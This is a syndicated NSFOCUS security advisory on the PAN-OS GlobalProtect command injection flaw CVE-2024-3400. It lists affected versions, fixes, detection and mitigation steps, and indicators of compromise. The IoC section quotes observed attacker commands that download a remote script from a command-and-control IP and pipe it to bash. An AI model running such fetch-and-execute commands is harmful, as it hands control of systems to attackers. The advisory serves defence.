Palo Alto Networks PAN-OS Command Injection Vulnerability (CVE-2024-3400)
2024-4-18 09:31:4 Author: securityboulevard.com(查看原文) 阅读量:17 收藏

Overview

Recently, NSFOCUS CERT detected that Palo Alto Networks issued a security announcement and fixed the command injection vulnerability (CVE-2024-3400) in PAN-OS. Since GlobalProtect gateway or portal configured in PAN-OS does not strictly filter user input, unauthenticated attackers can construct special packets to execute arbitrary code on the firewall with root privileges.

The CVSS score of the vulnerability is 10.0. At present, the PoC of this vulnerability has been made public and found to be in use. Relevant users are advised to take measures for protection as soon as possible.

Palo Alto Networks is a world-renowned network security manufacturer, and PAN-OS is an operating system developed by Palo Alto Networks for its firewall devices.

Reference link: https://security.paloaltonetworks.com/CVE-2024-3400

Scope of Impact

Affected version

AIE

  • 11.1.0 <= PAN-OS < 11.1.0-h3
  • 11.1.1 <= PAN-OS < 11.1.1-h1
  • 11.1.2 <= PAN-OS < 11.1.2-h3
  • 11.0.2 <= PAN-OS < 11.0.2-h4
  • 11.0.3 <= PAN-OS < 11.0.3-h10
  • 11.0.4 <= PAN-OS < 11.0.4-h1
  • 10.2.5 <= PAN-OS < 10.2.5-h6
  • 10.2.6 <= PAN-OS < 10.2.6-h3
  • 10.2.7 <= PAN-OS < 10.2.7-h8
  • 10.2.8 <= PAN-OS < 10.2.8-h3
  • 10.2.9 <= PAN-OS < 10.2.9-h1

Note: Cloud NGFW, Panorama devices and Prisma Access are not affected by this vulnerability.

Unaffected version

  • PAN-OS >= 10.2.9-h1 (Released 4/14/24)
  • PAN-OS >= 10.2.8-h3 (Released 4/15/24)
  • PAN-OS >= 10.2.7-h8 (Released 4/15/24)
  • PAN-OS >= 10.2.6-h3 (Released 4/16/24)
  • PAN-OS >= 10.2.5-h6 (Released 4/16/24)
  • PAN-OS >= 10.2.3-h13 (ETA: 4/17/24)
  • PAN-OS >= 10.2.1-h2 (ETA: 4/17/24)
  • PAN-OS >= 10.2.2-h5 (ETA: 4/18/24)
  • PAN-OS >= 10.2.0-h3 (ETA: 4/18/24)
  • PAN-OS >= 10.2.4-h16 (ETA: 4/19/24)
  • PAN-OS >= 11.0.4-h1 (Released 4/14/24)
  • PAN-OS >= 11.0.3-h10 (Released 4/16/24)
  • PAN-OS >= 11.0.2-h4 (Released 4/16/24)
  • PAN-OS >= 11.0.1-h4 (ETA: 4/17/24)
  • PAN-OS >= 11.0.0-h3 (ETA: 4/18/24)
  • PAN-OS >= 11.1.2-h3 (Released 4/14/24)
  • PAN-OS >= 11.1.1-h1 (Released 4/16/24)
  • PAN-OS >= 11.1.0-h3 (Released 4/16/24)

Detection

Manual detection

Users can verify if the GlobalProtect gateway is configured by checking the entries in the firewall Web interface (Network > GlobalProtect > Gateways or Network > GlobalProtect > Portals). Affected users can also check whether they have been intruded by this vulnerability based on the IoC information at the end of the article.

Mitigation

Official upgrade

At present, this vulnerability has been officially fixed in the latest version. Please upgrade the version for protection as soon as possible. The official download link: https://support.paloaltonetworks.com/support

Other measures

If relevant users cannot upgrade temporarily, they can use the subscribed threat protection for temporary mitigation: https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184

It is recommended to restrict access to the affected systems without affecting services. If this function is not used, users can disable GlobalProtect.

IoC

UPSTYLE Backdoor:

Update.py

3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac

5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078

Command and Control Infrastructure:

172.233.228[.]93

hxxp://172.233.228[.]93/policy

hxxp://172.233.228[.]93/patch

66.235.168[.]222

Hosted Python Backdoor:

144.172.79[.]92

nhdata.s3-us-west-2.amazonaws[.]com

Observed Commands:

wget -qO- hxxp://172.233.228[.]93/patch|bash

wget -qO- hxxp://172.233.228[.]93/policy | bash

Statement

This advisory is only used to describe a potential risk. NSFOCUS does not provide any commitment or promise on this advisory. NSFOCUS and the author will not bear any liability for any direct and/or indirect consequences and losses caused by transmitting and/or using this advisory. NSFOCUS reserves all the rights to modify and interpret this advisory. Please include this statement paragraph when reproducing or transferring this advisory. Do not modify this advisory, add/delete any information to/from it, or use this advisory for commercial purposes without permission from NSFOCUS.

About NSFOCUS

NSFOCUS, a pioneering leader in cybersecurity, is dedicated to safeguarding telecommunications, Internet service providers, hosting providers, and enterprises from sophisticated cyberattacks.

Founded in 2000, NSFOCUS operates globally with over 4000 employees at two headquarters in Beijing, China, and Santa Clara, CA, USA, and over 50 offices worldwide. It has a proven track record of protecting over 25% of the Fortune Global 500 companies, including four of the five largest banks and six of the world’s top ten telecommunications companies.

Leveraging technical prowess and innovation, NSFOCUS delivers a comprehensive suite of security solutions, including the Intelligent Security Operations Platform (ISOP) for modern SOC, DDoS Protection, Continuous Threat Exposure Management (CTEM) Service and Web Application and API Protection (WAAP). All the solutions and services are augmented by the Security Large Language Model (SecLLM), ML, patented algorithms and other cutting-edge research achievements developed by NSFOCUS.

The post Palo Alto Networks PAN-OS Command Injection Vulnerability (CVE-2024-3400) appeared first on NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks..

*** This is a Security Bloggers Network syndicated blog from NSFOCUS, Inc., a global network and cyber security leader, protects enterprises and carriers from advanced cyber attacks. authored by NSFOCUS. Read the original post at: https://nsfocusglobal.com/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/


文章来源: https://securityboulevard.com/2024/04/palo-alto-networks-pan-os-command-injection-vulnerability-cve-2024-3400/
如有侵权请联系:admin#unsafe.sh